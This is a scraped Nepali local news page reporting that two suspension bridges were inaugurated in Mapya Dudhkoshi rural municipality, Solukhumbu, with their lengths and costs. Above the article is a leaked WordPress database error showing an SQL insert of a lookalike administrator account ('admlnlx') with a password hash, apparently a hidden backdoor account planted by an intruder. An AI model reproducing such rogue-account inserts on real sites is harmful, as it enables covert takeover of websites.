WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BJZuUWDhIJ3vqkP4hYWJqU6OzFJClP1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 08:20:20', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, ३० जेष्ठ, सोलुखुम्बु । माप्य दुधकोशी गाउँपालिकामा एकै दिन दुईवटा झोलुङ्गे पुलको उत्घाटन सम्पन्न भएको छ ।
माप्य दुधकोशी गाउँपालिका वडा नं.३ र ४ जोड्ने चेल्सि खोला र माप्य दुधकोशी गाउँपालिका वडा नं.३ र ६ जोड्ने दुधकोशी नदिको पसमदुमा निमार्ण भएको दुवै झोलुङ्गे पुलको माप्य दुधकोशी गाउँपालिका अध्यक्ष बुद्धि किरण राईले बिधिवत रुपमा रिवन काटेर उत्घाटन गर्नुभएको हो ।
माप्य दुधकोशी गाउँपालिका ३ र ४ जोड्ने चेल्सिखोलाको ९० मिटर लामो पुल ४२ लाख र वडा नं. ३ र ६ जोड्ने पसमदुमा निमार्ण भएको ११४ मिटर लामो पुल ६९ लाख ८४ हजारमा निमार्ण भएको गाउँपालिकाले जानाएको छ ।